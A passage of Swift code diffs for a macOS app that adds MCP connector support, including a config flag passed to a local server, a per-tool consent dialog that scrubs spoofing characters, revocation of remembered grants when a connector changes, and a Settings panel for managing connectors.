         let chat = ChatViewModel(tools: toolRegistry, sampling: samplingConfig, server: manager)
         let updateChecker = UpdateChecker()
         let installerInstance = Installer()
@@ -168,6 +203,10 @@ struct RapidApp: App {
                 .environment(dockPromptStore)
                 .environment(webSearch)
                 .environment(browseApproval)
+                .environment(mcpConfig)
+                .environment(mcpCatalog)
+                .environment(mcpApproval)
+                .environment(mcpTools)
                 .task {
                     // DEV-ONLY: render real screens to PNG when
                     // RAPID_DEV_SNAPSHOT_DIR is set, then quit. Inert
@@ -286,6 +325,10 @@ struct RapidApp: App {
                 .environment(dockPromptStore)
                 .environment(webSearch)
                 .environment(browseApproval)
+                .environment(mcpConfig)
+                .environment(mcpCatalog)
+                .environment(mcpApproval)
+                .environment(mcpTools)
         }
         .windowResizability(.contentMinSize)
         .defaultSize(width: 900, height: 720)

--- a/apps/rapid-mac/Sources/Rapid/RapidApp.swift
+++ b/apps/rapid-mac/Sources/Rapid/RapidApp.swift
@@ -152,6 +152,16 @@ struct RapidApp: App {
         mcpConfigStore.onServerReconfigured = { [weak mcpApprovalStore] serverName in
             mcpApprovalStore?.revokeGrants(forServer: serverName)
         }
+        // The config file is hand-editable, and an edit made while the app was
+        // closed never hits the hook above. Reconcile once at launch against
+        // the loaded connectors' fingerprints so a hand-swapped command drops
+        // its grant before any tool can run.
+        mcpApprovalStore.reconcileGrants(
+            against: Dictionary(
+                mcpConfigStore.servers.map { ($0.name, $0.executionFingerprint) },
+                uniquingKeysWith: { first, _ in first }
+            )
+        )
         _mcpConfig = State(initialValue: mcpConfigStore)
         _mcpCatalog = State(initialValue: mcpCatalog)
         _mcpApproval = State(initialValue: mcpApprovalStore)

--- a/apps/rapid-mac/Sources/Rapid/RapidApp.swift
+++ b/apps/rapid-mac/Sources/Rapid/RapidApp.swift
@@ -146,6 +146,12 @@ struct RapidApp: App {
         manager.mcpConfigPathProvider = { [weak mcpConfigStore] in
             MainActor.assumeIsolated { mcpConfigStore?.launchConfigPath }
         }
+        // Editing what a connector runs (or removing it) drops any "always
+        // allow" remembered against it, so consent can't transfer to code the
+        // user never approved.
+        mcpConfigStore.onServerReconfigured = { [weak mcpApprovalStore] serverName in
+            mcpApprovalStore?.revokeGrants(forServer: serverName)
+        }
         _mcpConfig = State(initialValue: mcpConfigStore)
         _mcpCatalog = State(initialValue: mcpCatalog)
         _mcpApproval = State(initialValue: mcpApprovalStore)

--- a/apps/rapid-mac/Sources/Rapid/Server/ServerManager.swift
+++ b/apps/rapid-mac/Sources/Rapid/Server/ServerManager.swift
@@ -161,7 +161,10 @@ final class ServerManager {
     /// inherits that choice; the chat surface derives its default from
     /// ``PortSweep.defaultPort`` via ``ChatStreamClient.loopbackURL(port:)``
     /// and re-targets onto ``activePort`` at first request.
-    private let host: String = "127.0.0.1"
+    /// Loopback only. ``internal`` (was private) so ``MCPCatalog`` can build
+    /// its own requests against the same address the chat stream uses rather
+    /// than hardcoding a second copy of the literal.
+    let host: String = "127.0.0.1"
 
     /// The port the most recent ``start()`` actually bound rapid-mlx
     /// to. Initialised to ``PortSweep.defaultPort`` (8000) so callers
@@ -184,6 +187,17 @@ final class ServerManager {
     /// or in the (rare) RNG-failure case "we refused to start
     /// without auth", which surfaces as ``.crashed`` to the user.
     private(set) var activeBearer: String?
+
+    /// Supplies the `--mcp-config` path for the next spawn, or `nil` to launch
+    /// with the MCP subsystem entirely absent.
+    ///
+    /// Issue #1716. A closure rather than a stored path because the answer
+    /// changes while the app is running (the user adds a connector, or turns
+    /// the master switch off) and is owned by ``MCPConfigStore``, which lives
+    /// in the SwiftUI environment. ``RapidApp`` installs it at construction;
+    /// tests and the dev-snapshot harness leave it nil and get the pre-#1716
+    /// argv verbatim.
+    var mcpConfigPathProvider: (() -> String?)?
 
     /// Health-check budget — interpreted as a **stall window** since
     /// v0.7.13, not a wall-clock-from-launch cap. The deadline slides
@@ -1121,7 +1135,12 @@ final class ServerManager {
             alias: trimmedAlias,
             host: host,
             port: activePort,
-            extraFlags: extraFlags
+            extraFlags: extraFlags,
+            // Issue #1716: resolved at spawn, not at construction — the user
+            // can add their first connector long after the app launched, and
+            // a path captured in ``init`` would still be nil on the next
+            // start. Nil whenever connectors are off or empty.
+            mcpConfigPath: mcpConfigPathProvider?()
         )
 
         // Issue #503: resolve the user's "Models folder" preference for
@@ -2225,7 +2244,8 @@ final class ServerManager {
         alias: String,
         host: String,
         port: Int,
-        extraFlags: [String] = []
+        extraFlags: [String] = [],
+        mcpConfigPath: String? = nil
     ) -> [String] {
         // Defense in depth: ``start(alias:)`` already calls
         // ``isValidAlias`` before reaching here, but a future caller
@@ -2255,6 +2275,17 @@ final class ServerManager {
         // when the alias is the recommended pick for THIS Mac's RAM — so a
         // hand-picked model on a larger Mac keeps its full capabilities.
         args.append(contentsOf: extraFlags)
+        // Issue #1716: point the child at the connector config the app owns
+        // (``MCPConfigStore``). Only non-nil when the user has turned
+        // connectors on AND has at least one enabled server — MCP spawns
+        // arbitrary local processes, so the subsystem stays entirely absent
+        // until it is asked for.
+        //
+        // Safe after ``--cors-origins`` for the same reason ``extraFlags`` is:
+        // the leading ``--`` terminates that flag's ``nargs="+"`` collection.
+        if let mcpConfigPath, !mcpConfigPath.isEmpty {
+            args.append(contentsOf: ["--mcp-config", mcpConfigPath])
+        }
         return args
     }
 

--- a/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
@@ -20,6 +20,8 @@ struct ContentView: View {
     @Environment(UpdateChecker.self) private var updater
     @Environment(QuickstartCoordinator.self) private var quickstart
     @Environment(BrowseApprovalStore.self) private var browseApproval
+    @Environment(MCPCatalog.self) private var mcpCatalog
+    @Environment(MCPToolApprovalStore.self) private var mcpApproval
     @Environment(\.openWindow) private var openWindow
 
     @State private var alias: String = ""
@@ -113,6 +115,16 @@ struct ContentView: View {
                 if server.downloadProgress.hasObservedGrowth {
                     downloads.markCacheChanged()
                 }
+                // Issue #1716: the child has just published which MCP servers
+                // it connected to. Read it once here rather than polling —
+                // the state only changes on a spawn or an explicit reload,
+                // and both funnel through a point that refreshes.
+                Task { await mcpCatalog.refresh() }
+            } else {
+                // Any non-ready state means no child is answering. Drop the
+                // tool list: keeping it would let the chat loop advertise —
+                // and try to execute — tools with no process behind them.
+                mcpCatalog.clear()
             }
         }
         .onChange(of: alias) { _, newValue in
@@ -266,6 +278,10 @@ struct ContentView: View {
         // the user has turned on auto-approve in Settings (resolved before a
         // request is ever published), so it only appears on a real prompt.
         .modifier(BrowseApprovalDialog(store: browseApproval))
+        // Issue #1716: per-tool consent for MCP connector tools. Same shape as
+        // the browse sheet above — an MCP server is an arbitrary local process,
+        // so "may the model run this" is a decision that belongs on screen.
+        .modifier(MCPToolApprovalDialog(store: mcpApproval))
         // #1589: keyed on the consent decision rather than fire-once, so
         // the launch auto-start that stood down for the modal sheet gets
         // its turn the moment the user answers it. The value only ever
@@ -976,6 +992,99 @@ private struct BrowseApprovalSheet: View {
         // needs to press. "The approval is up" is better asserted by waiting
         // for `ToolApproval.Browse.Allow`, which is the control the user acts
         // on rather than a wrapper around it.
+    }
+}
+
+/// Approval dialog for an MCP connector tool (issue #1716). Mirrors
+/// ``BrowseApprovalDialog``: present while a request is pending, deny on
+/// external dismiss so a suspended tool call can never hang on a sheet the
+/// user has closed.
+private struct MCPToolApprovalDialog: ViewModifier {
+    let store: MCPToolApprovalStore
+
+    func body(content: Content) -> some View {
+        content.sheet(isPresented: Binding(
+            get: { store.pendingRequest != nil },
+            set: { if !$0 && store.pendingRequest != nil { store.answer(.deny) } }
+        )) {
+            if let req = store.pendingRequest {
+                MCPToolApprovalSheet(request: req, store: store)
+            }
+        }
+    }
+}
+
+/// Consent sheet for one connector tool call.
+///
+/// Shows the server, the tool, and the arguments the MODEL chose — all three
+/// matter. A tool name alone ("run `read_file`?") is not a question anyone can
+/// answer: which server's `read_file`, and reading what? The arguments are
+/// rendered display-safe for the same reason the browse sheet renders its URL
+/// that way — a model can hide the real target behind bidi or zero-width
+/// scalars, and the user has to see what the engine will actually receive.
+///
+/// "Always allow" is scoped to THIS tool. That is the difference from the
+/// browse sheet, whose equivalent flips one global mode: a blanket grant
+/// across an open-ended, user-installed tool set is not something to hand out
+/// as a side effect of approving one call.
+private struct MCPToolApprovalSheet: View {
+    let request: MCPToolApprovalStore.PendingApproval
+    let store: MCPToolApprovalStore
+
+    var body: some View {
+        VStack(alignment: .leading, spacing: 14) {
+            Text("Run \(request.shortName)?")
+                .font(.headline)
+            Text("The model wants to run a tool from the “\(request.serverName)” connector.")
+                .font(.callout)
+                .foregroundStyle(.secondary)
+
+            Text(request.toolName)
+                .font(.system(.body, design: .monospaced).weight(.semibold))
+                .textSelection(.enabled)
+
+            if !request.argumentsPreview.isEmpty {
+                Text("With:")
+                    .font(.caption)
+                    .foregroundStyle(.secondary)
+                ScrollView {
+                    Text(request.argumentsPreview)
+                        .font(.system(.callout, design: .monospaced))
+                        .textSelection(.enabled)
+                        .frame(maxWidth: .infinity, alignment: .leading)
+                        .padding(10)
+                }
+                .frame(minHeight: 44, maxHeight: 140)
+                .background(Color(nsColor: .textBackgroundColor))
+                .overlay(RoundedRectangle(cornerRadius: 6).stroke(.quaternary))
+                .clipShape(RoundedRectangle(cornerRadius: 6))
+            }
+
+            Text("Connectors are programs running on this Mac. Only allow tools "
+                + "from servers you set up yourself.")
+                .font(.caption)
+                .foregroundStyle(.secondary)
+
+            Text("Always allow applies to this tool only. You can review and "
+                + "revoke it in Settings → Connectors.")
+                .font(.caption)
+                .foregroundStyle(.secondary)
+
+            HStack {
+                Spacer()
+                Button("Don't allow") { store.answer(.deny) }
+                    .keyboardShortcut(.cancelAction)
+                    .accessibilityIdentifier("ToolApproval.MCP.Deny")
+                Button("Always allow") { store.answer(.alwaysAllowTool) }
+                    .accessibilityIdentifier("ToolApproval.MCP.AlwaysAllow")
+                Button("Allow once") { store.answer(.allowOnce) }
+                    .keyboardShortcut(.defaultAction)
+                    .accessibilityIdentifier("ToolApproval.MCP.Allow")
+            }
+        }
+        .padding(20)
+        .frame(width: 460)
+        // No wrapper identifier — see the note on ``BrowseApprovalSheet``.
     }
 }
 

--- a/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
@@ -1039,7 +1039,10 @@ private struct MCPToolApprovalSheet: View {
                 .font(.callout)
                 .foregroundStyle(.secondary)
 
-            Text(request.toolName)
+            // `toolName` is the raw server-supplied name (kept raw on the
+            // request for dispatch and grant keys); scrub it for display so a
+            // bidi/zero-width scalar can't spoof which tool this dialog approves.
+            Text(BrowseApprovalStore.displaySafe(request.toolName))
                 .font(.system(.body, design: .monospaced).weight(.semibold))
                 .textSelection(.enabled)
 

--- a/apps/rapid-mac/Sources/Rapid/UI/MCPServerEditorSheet.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/MCPServerEditorSheet.swift
@@ -1,0 +1,178 @@
+import SwiftUI
+
+/// Add or edit one MCP server (issue #1716).
+///
+/// This is the form that replaces hand-authoring `mcp.json`. It deliberately
+/// validates the name locally — the engine namespaces every tool as
+/// `server__tool`, so a name with a space in it produces tool names the model
+/// can never call, and finding that out through "the model just ignores that
+/// server" is a bad afternoon.
+///
+/// The engine still gets the final say on the command itself
+/// (`vllm_mlx/mcp/security.py` allowlists what may be spawned). We don't
+/// duplicate that list here: it moves independently of the app, and a
+/// client-side copy that drifts would either block something valid or promise
+/// something that then fails at connect. The rejection reason comes back on
+/// the server row instead.
+struct MCPServerEditorSheet: View {
+    /// nil when adding.
+    let original: MCPServerConfig?
+    let onSave: (MCPServerConfig) -> Void
+    let onCancel: () -> Void
+
+    @State private var name: String
+    @State private var transport: MCPServerConfig.Transport
+    @State private var command: String
+    @State private var url: String
+    @State private var enabled: Bool
+    /// Args and env are edited as text — one per line, `KEY=value` for env.
+    /// A table of add/remove rows is more clicks for the same result, and this
+    /// shape pastes straight out of any MCP README.
+    @State private var argsText: String
+    @State private var envText: String
+
+    init(
+        original: MCPServerConfig?,
+        onSave: @escaping (MCPServerConfig) -> Void,
+        onCancel: @escaping () -> Void
+    ) {
+        self.original = original
+        self.onSave = onSave
+        self.onCancel = onCancel
+        _name = State(initialValue: original?.name ?? "")
+        _transport = State(initialValue: original?.transport ?? .stdio)
+        _command = State(initialValue: original?.command ?? "")
+        _url = State(initialValue: original?.url ?? "")
+        _enabled = State(initialValue: original?.enabled ?? true)
+        _argsText = State(initialValue: (original?.args ?? []).joined(separator: "\n"))
+        _envText = State(initialValue: (original?.env ?? [:])
+            .sorted { $0.key < $1.key }
+            .map { "\($0.key)=\($0.value)" }
+            .joined(separator: "\n"))
+    }
+
+    /// The value that would be saved. Built fresh each render so the inline
+    /// validation message and the Save button can never disagree about it.
+    private var draft: MCPServerConfig {
+        MCPServerConfig(
+            name: name.trimmingCharacters(in: .whitespaces),
+            transport: transport,
+            command: transport == .stdio
+                ? command.trimmingCharacters(in: .whitespaces)
+                : nil,
+            args: transport == .stdio ? Self.parseLines(argsText) : [],
+            env: transport == .stdio ? Self.parseEnv(envText) : [:],
+            url: transport == .sse ? url.trimmingCharacters(in: .whitespaces) : nil,
+            enabled: enabled,
+            timeout: original?.timeout ?? 30
+        )
+    }
+
+    var body: some View {
+        VStack(alignment: .leading, spacing: 16) {
+            Text(original == nil ? "Add connector" : "Edit “\(original?.name ?? "")”")
+                .font(.headline)
+
+            Form {
+                TextField("Name", text: $name)
+                    .accessibilityIdentifier("Settings.Connectors.Editor.Name")
+                Text("Letters, numbers, dashes and underscores. Becomes the prefix on every tool this connector exposes.")
+                    .font(.caption)
+                    .foregroundStyle(.secondary)
+
+                Picker("Type", selection: $transport) {
+                    ForEach(MCPServerConfig.Transport.allCases, id: \.self) { t in
+                        Text(t.displayName).tag(t)
+                    }
+                }
+                .accessibilityIdentifier("Settings.Connectors.Editor.Transport")
+
+                switch transport {
+                case .stdio:
+                    TextField("Command", text: $command)
+                        .accessibilityIdentifier("Settings.Connectors.Editor.Command")
+                    Text("For example `uvx` or `npx`. Rapid's engine only runs commands on its allowlist.")
+                        .font(.caption)
+                        .foregroundStyle(.secondary)
+
+                    VStack(alignment: .leading, spacing: 4) {
+                        Text("Arguments — one per line")
+                            .font(.caption)
+                            .foregroundStyle(.secondary)
+                        TextEditor(text: $argsText)
+                            .font(.system(.callout, design: .monospaced))
+                            .frame(height: 64)
+                            .overlay(RoundedRectangle(cornerRadius: 6).stroke(.quaternary))
+                            .accessibilityIdentifier("Settings.Connectors.Editor.AddArgument")
+                    }
+
+                    VStack(alignment: .leading, spacing: 4) {
+                        Text("Environment — one KEY=value per line")
+                            .font(.caption)
+                            .foregroundStyle(.secondary)
+                        TextEditor(text: $envText)
+                            .font(.system(.callout, design: .monospaced))
+                            .frame(height: 52)
+                            .overlay(RoundedRectangle(cornerRadius: 6).stroke(.quaternary))
+                            .accessibilityIdentifier("Settings.Connectors.Editor.AddEnv")
+                    }
+
+                case .sse:
+                    TextField("URL", text: $url)
+                        .accessibilityIdentifier("Settings.Connectors.Editor.URL")
+                    Text("An http:// or https:// endpoint speaking MCP over SSE.")
+                        .font(.caption)
+                        .foregroundStyle(.secondary)
+                }
+
+                Toggle("Enabled", isOn: $enabled)
+                    .accessibilityIdentifier("Settings.Connectors.Editor.Enabled")
+            }
+            .formStyle(.grouped)
+
+            if let why = draft.validationError, !name.isEmpty || !command.isEmpty || !url.isEmpty {
+                // Held back until the user has typed something — an empty form
+                // that scolds you before you start is noise, not guidance.
+                Label(why, systemImage: "exclamationmark.triangle.fill")
+                    .font(.caption)
+                    .foregroundStyle(.orange)
+                    .fixedSize(horizontal: false, vertical: true)
+            }
+
+            HStack {
+                Spacer()
+                Button("Cancel", action: onCancel)
+                    .keyboardShortcut(.cancelAction)
+                    .accessibilityIdentifier("Settings.Connectors.Editor.Cancel")
+                Button("Save") { onSave(draft) }
+                    .keyboardShortcut(.defaultAction)
+                    .disabled(draft.validationError != nil)
+                    .accessibilityIdentifier("Settings.Connectors.Editor.Allow")
+            }
+        }
+        .padding(20)
+        .frame(width: 480)
+    }
+
+    /// Non-empty, whitespace-trimmed lines. `static` so the parsing can be
+    /// pinned by tests without standing up the view.
+    static func parseLines(_ text: String) -> [String] {
+        text.split(whereSeparator: { $0 == "\n" || $0 == "\r" })
+            .map { $0.trimmingCharacters(in: .whitespaces) }
+            .filter { !$0.isEmpty }
+    }
+
+    /// `KEY=value` per line. Splits on the FIRST `=` so a value containing one
+    /// survives; a line with no `=` is skipped rather than becoming an empty
+    /// key the engine would then have to reject.
+    static func parseEnv(_ text: String) -> [String: String] {
+        var out: [String: String] = [:]
+        for line in parseLines(text) {
+            guard let idx = line.firstIndex(of: "=") else { continue }
+            let key = String(line[line.startIndex..<idx]).trimmingCharacters(in: .whitespaces)
+            let value = String(line[line.index(after: idx)...])
+            if !key.isEmpty { out[key] = value }
+        }
+        return out
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
@@ -1,0 +1,523 @@
+import SwiftUI
+
+/// Settings → Connectors. The whole user-facing surface for MCP (issue #1716).
+///
+/// Before this, MCP was engine-complete and app-invisible: the only way to use
+/// it from the desktop was to hand-author `~/.config/rapid-mlx/mcp.json` and
+/// hope. This panel does four things that file cannot:
+///
+///   * add / edit / remove servers, and show whether each one actually
+///     connected — including the reason when it didn't;
+///   * list the tools each server exposes, with a per-tool off switch;
+///   * show and revoke the per-tool consent record;
+///   * apply an edit without restarting the model, or say plainly when it
+///     can't.
+struct SettingsConnectorsPanel: View {
+    @Environment(MCPConfigStore.self) private var config
+    @Environment(MCPCatalog.self) private var catalog
+    @Environment(MCPToolApprovalStore.self) private var approval
+    @Environment(MCPToolRegistry.self) private var registry
+    @Environment(ServerManager.self) private var server
+
+    /// The server being added or edited, when the sheet is up.
+    @State private var editing: EditorTarget?
+    /// Non-nil when a save / remove / reload failed, shown inline.
+    @State private var actionError: String?
+    @State private var confirmingRemoval: MCPServerConfig?
+    /// True while the banner's Restart button is cycling the child.
+    @State private var isRestarting: Bool = false
+
+    /// Whether the running model has to be restarted before connectors can
+    /// work — **derived**, never stored.
+    ///
+    /// This was `@State` set from the reload result, and that was wrong in a
+    /// way a user hit immediately: `@State` dies with the view, so switching
+    /// Settings tabs or closing the window reset it to false while the
+    /// condition it described was still true. The banner vanished and the user
+    /// was left with only the engine's raw complaint. The condition is fully
+    /// determined by durable state, so read it from there every time:
+    /// connectors are on, a child is running, and that child reports it has no
+    /// MCP config — which is exactly what happens when it was spawned before
+    /// connectors were switched on, since `--mcp-config` is read once at spawn.
+    private var needsRestart: Bool {
+        config.isEnabled
+            && server.launchedChildAlias != nil
+            && !catalog.isConfigured
+    }
+
+    struct EditorTarget: Identifiable {
+        /// nil when adding.
+        let original: MCPServerConfig?
+        var id: String { original?.name ?? "" }
+    }
+
+    var body: some View {
+        @Bindable var config = config
+        return VStack(alignment: .leading, spacing: 20) {
+            masterSection
+            if config.isEnabled {
+                serversSection
+                if !catalog.tools.isEmpty {
+                    toolsSection
+                }
+                approvalSection
+            }
+        }
+        .task(id: config.isEnabled) {
+            // Reflect reality on open: the panel is the one place a user comes
+            // to ask "did it work?", and a stale list is worse than a blank
+            // one. Cheap — two loopback GETs.
+            guard config.isEnabled else { return }
+            await catalog.refresh()
+        }
+        .sheet(item: $editing) { target in
+            MCPServerEditorSheet(
+                original: target.original,
+                onSave: { updated in save(updated, replacing: target.original?.name) },
+                onCancel: { editing = nil }
+            )
+        }
+        .confirmationDialog(
+            "Remove “\(confirmingRemoval?.name ?? "")”?",
+            isPresented: Binding(
+                get: { confirmingRemoval != nil },
+                set: { if !$0 { confirmingRemoval = nil } }
+            ),
+            titleVisibility: .visible
+        ) {
+            Button("Remove", role: .destructive) {
+                if let target = confirmingRemoval { remove(target) }
+                confirmingRemoval = nil
+            }
+            .accessibilityIdentifier("Settings.Connectors.ConfirmRemove")
+            Button("Cancel", role: .cancel) { confirmingRemoval = nil }
+                .accessibilityIdentifier("Settings.Connectors.CancelRemove")
+        } message: {
+            Text("Its tools stop being offered to the model. The program itself isn't uninstalled.")
+        }
+    }
+
+    // MARK: - Master switch
+
+    private var masterSection: some View {
+        @Bindable var config = config
+        return VStack(alignment: .leading, spacing: 8) {
+            header(
+                "Connectors",
+                "Connect the model to MCP servers — programs on this Mac that expose tools like file access, databases or search. Off by default: a connector is a program that runs on your machine and that the model can invoke."
+            )
+            card {
+                Toggle(isOn: $config.isEnabled) {
+                    VStack(alignment: .leading, spacing: 2) {
+                        Text("Enable connectors")
+                            .font(.system(size: 12, weight: .medium))
+                        Text("The local server only loads connectors when this is on.")
+                            .font(.caption)
+                            .foregroundStyle(.secondary)
+                    }
+                }
+                .toggleStyle(TrailingSettingsToggleStyle())
+                .accessibilityIdentifier("Settings.Connectors.MasterToggle")
+                // Turning the master switch on or off changes whether the child
+                // gets --mcp-config at all, which a hot reload cannot express —
+                // the flag is read once at spawn. ``needsRestart`` derives that
+                // from live state, so nothing is recorded here.
+                .onChange(of: config.isEnabled) { _, isOn in
+                    if !isOn {
+                        // Don't make the user wait for that restart to stop
+                        // offering connector tools. The child may still have
+                        // them loaded, but "connectors are off" has to mean
+                        // the model is not handed them on the very next turn —
+                        // dropping the catalog is what enforces that, since
+                        // ``MCPToolRegistry/definitions`` reads from it.
+                        catalog.clear()
+                    }
+                }
+            }
+        }
+    }
+
+    // MARK: - Servers
+
+    private var serversSection: some View {
+        VStack(alignment: .leading, spacing: 8) {
+            HStack(alignment: .firstTextBaseline) {
+                header(
+                    "Servers",
+                    "Each server runs as its own program and exposes a set of tools."
+                )
+                Spacer()
+                Button("Add…") { editing = EditorTarget(original: nil) }
+                    .accessibilityIdentifier("Settings.Connectors.AddButton")
+            }
+
+            if let why = config.loadError {
+                banner(why, systemImage: "exclamationmark.triangle.fill", tone: .orange)
+            }
+            // The restart case owns its own banner. Suppressing the engine's
+            // string here is deliberate: when the child has no config path the
+            // engine says "start the server with --mcp-config", which is
+            // operator language for a situation the desktop user reaches
+            // without ever seeing a command line. Telling them to pass a flag
+            // they have no way to pass is worse than saying nothing.
+            if needsRestart {
+                restartBanner
+            } else if let why = catalog.subsystemError {
+                banner(
+                    "Connectors couldn't start: \(why)",
+                    systemImage: "exclamationmark.triangle.fill",
+                    tone: .orange
+                )
+                .accessibilityIdentifier("Settings.Connectors.SubsystemError")
+            }
+            if let why = actionError {
+                banner(why, systemImage: "exclamationmark.triangle.fill", tone: .red)
+            }
+
+            card {
+                if config.servers.isEmpty {
+                    Text("No connectors yet. Add one to give the model tools beyond the built-ins.")
+                        .font(.callout)
+                        .foregroundStyle(.secondary)
+                        .frame(maxWidth: .infinity, alignment: .leading)
+                } else {
+                    VStack(alignment: .leading, spacing: 0) {
+                        ForEach(Array(config.servers.enumerated()), id: \.element.name) { idx, entry in
+                            if idx > 0 { Divider().padding(.vertical, 10) }
+                            serverRow(entry)
+                        }
+                    }
+                }
+            }
+        }
+    }
+
+    @ViewBuilder
+    private func serverRow(_ entry: MCPServerConfig) -> some View {
+        let status = catalog.servers.first { $0.name == entry.name }
+        HStack(alignment: .top, spacing: 10) {
+            statusDot(for: entry, status: status)
+                .padding(.top, 4)
+            VStack(alignment: .leading, spacing: 3) {
+                Text(entry.name)
+                    .font(.system(size: 12, weight: .medium, design: .monospaced))
+                Text(entry.summaryLine)
+                    .font(.caption)
+                    .foregroundStyle(.secondary)
+                    .lineLimit(2)
+                    .fixedSize(horizontal: false, vertical: true)
+                Text(statusLine(for: entry, status: status))
+                    .font(.caption)
+                    .foregroundStyle(status?.error != nil ? .orange : .secondary)
+                    .fixedSize(horizontal: false, vertical: true)
+                    .accessibilityIdentifier("Settings.Connectors.Row.Status.\(entry.name)")
+            }
+            Spacer(minLength: 8)
+            Toggle("", isOn: Binding(
+                get: { entry.enabled },
+                set: { setEnabled(entry, $0) }
+            ))
+            .labelsHidden()
+            .toggleStyle(.switch)
+            .controlSize(.small)
+            .accessibilityIdentifier("Settings.Connectors.Row.Toggle.\(entry.name)")
+            Menu {
+                Button("Edit…") { editing = EditorTarget(original: entry) }
+                    .accessibilityIdentifier("Settings.Connectors.Row.Edit.\(entry.name)")
+                Button("Remove", role: .destructive) { confirmingRemoval = entry }
+                    .accessibilityIdentifier("Settings.Connectors.Row.Remove.\(entry.name)")
+            } label: {
+                Image(systemName: "ellipsis.circle")
+            }
+            .menuStyle(.borderlessButton)
+            .fixedSize()
+            .accessibilityIdentifier("Settings.Connectors.Row.Menu.\(entry.name)")
+        }
+    }
+
+    @ViewBuilder
+    private func statusDot(for entry: MCPServerConfig, status: MCPCatalog.ServerStatus?) -> some View {
+        let color: Color = {
+            if !entry.enabled { return .secondary }
+            guard let status else { return .secondary }
+            if status.error != nil || status.state == "error" { return .orange }
+            return status.isConnected ? .green : .secondary
+        }()
+        Circle().fill(color).frame(width: 8, height: 8)
+    }
+
+    /// One line saying what this server is doing right now — the question the
+    /// panel exists to answer.
+    private func statusLine(for entry: MCPServerConfig, status: MCPCatalog.ServerStatus?) -> String {
+        if !entry.enabled { return "Turned off" }
+        if let error = status?.error { return error }
+        if let status {
+            if status.isConnected {
+                let n = status.toolsCount
+                return n == 1 ? "Connected · 1 tool" : "Connected · \(n) tools"
+            }
+            return status.state.capitalized
+        }
+        // No row from the engine at all.
+        if server.launchedChildAlias == nil {
+            return "Start a model to connect"
+        }
+        if catalog.fetchError != nil {
+            return "Couldn't check — the local server didn't answer"
+        }
+        return needsRestart ? "Not applied yet" : "Not connected"
+    }
+
+    /// Shown when the running model predates the connectors being switched on.
+    ///
+    /// Carries a real button rather than an instruction. Telling a user to go
+    /// find the model picker and cycle it themselves is asking them to do the
+    /// app's job — and the earlier version of this banner did exactly that,
+    /// alongside an engine message about a command-line flag.
+    private var restartBanner: some View {
+        HStack(alignment: .top, spacing: 10) {
+            Image(systemName: "arrow.clockwise.circle.fill")
+                .foregroundStyle(.orange)
+            VStack(alignment: .leading, spacing: 6) {
+                Text("Restart the model to finish turning connectors on.")
+                    .font(.callout)
+                Text("The running model started before connectors were enabled, so it isn't loading them yet. Restarting takes a moment and keeps your conversation.")
+                    .font(.caption)
+                    .foregroundStyle(.secondary)
+                    .fixedSize(horizontal: false, vertical: true)
+            }
+            Spacer(minLength: 8)
+            Button(isRestarting ? "Restarting…" : "Restart") { restartModel() }
+                .disabled(isRestarting || server.isOperating)
+                .accessibilityIdentifier("Settings.Connectors.RestartButton")
+        }
+        .padding(12)
+        .background(RoundedRectangle(cornerRadius: 8).fill(Color.orange.opacity(0.12)))
+    }
+
+    /// Stop-then-start the current alias so the child is respawned WITH
+    /// ``--mcp-config``. Mirrors the model-switch path in ``ContentView``.
+    private func restartModel() {
+        guard let alias = server.launchedChildAlias else { return }
+        isRestarting = true
+        Task {
+            await server.stop()
+            await server.start(alias: alias)
+            // The fresh child publishes its connector state on /healthz; the
+            // ready transition in ContentView refreshes the catalog, but this
+            // panel may be the only thing on screen — refresh here too so the
+            // rows update without the user poking anything.
+            await catalog.refresh()
+            isRestarting = false
+        }
+    }
+
+    // MARK: - Tools
+
+    private var toolsSection: some View {
+        VStack(alignment: .leading, spacing: 8) {
+            header(
+                "Tools",
+                "What the connected servers expose. Turn one off and it is never offered to the model — and never runs, even if the model asks for it by name."
+            )
+            card {
+                VStack(alignment: .leading, spacing: 12) {
+                    ForEach(registry.allKnownTools, id: \.function.name) { def in
+                        toolRow(def)
+                    }
+                }
+            }
+        }
+    }
+
+    @ViewBuilder
+    private func toolRow(_ def: ToolDefinition) -> some View {
+        let name = def.function.name
+        Toggle(isOn: Binding(
+            get: { registry.isToolEnabled(name) },
+            set: { registry.setToolEnabled(name, $0) }
+        )) {
+            HStack(alignment: .top, spacing: 10) {
+                Image(systemName: "wrench.and.screwdriver")
+                    .foregroundStyle(RapidTheme.brand)
+                    .frame(width: 18)
+                VStack(alignment: .leading, spacing: 2) {
+                    HStack(spacing: 6) {
+                        Text(MCPToolApprovalStore.shortToolName(name))
+                            .font(.system(size: 12, weight: .medium, design: .monospaced))
+                        if let source = catalog.serverForTool[name] {
+                            Text(source)
+                                .font(.system(size: 10, weight: .medium))
+                                .padding(.horizontal, 5)
+                                .padding(.vertical, 1)
+                                .background(Capsule().fill(RapidTheme.brand.opacity(0.15)))
+                        }
+                        if approval.grantedTools.contains(name) {
+                            Text("always allowed")
+                                .font(.system(size: 10))
+                                .foregroundStyle(.secondary)
+                        }
+                    }
+                    Text(def.function.description)
+                        .font(.caption)
+                        .foregroundStyle(.secondary)
+                        .fixedSize(horizontal: false, vertical: true)
+                }
+            }
+        }
+        .toggleStyle(TrailingSettingsToggleStyle())
+        .accessibilityIdentifier("Settings.Connectors.Tool.Toggle.\(name)")
+    }
+
+    // MARK: - Approvals
+
+    private var approvalSection: some View {
+        @Bindable var approval = approval
+        return VStack(alignment: .leading, spacing: 8) {
+            header(
+                "Approvals",
+                "The first time the model calls a connector tool, Rapid asks. Your answer is remembered per tool."
+            )
+            card {
+                VStack(alignment: .leading, spacing: 14) {
+                    Toggle(isOn: Binding(
+                        get: { approval.mode == .autoApproveAll },
+                        set: { approval.mode = $0 ? .autoApproveAll : .ask }
+                    )) {
+                        VStack(alignment: .leading, spacing: 2) {
+                            Text("Auto-approve all tool calls")
+                                .font(.system(size: 12, weight: .medium))
+                            Text("Skips every prompt, including for connectors added later. For unattended use only.")
+                                .font(.caption)
+                                .foregroundStyle(.secondary)
+                                .fixedSize(horizontal: false, vertical: true)
+                        }
+                    }
+                    .toggleStyle(TrailingSettingsToggleStyle())
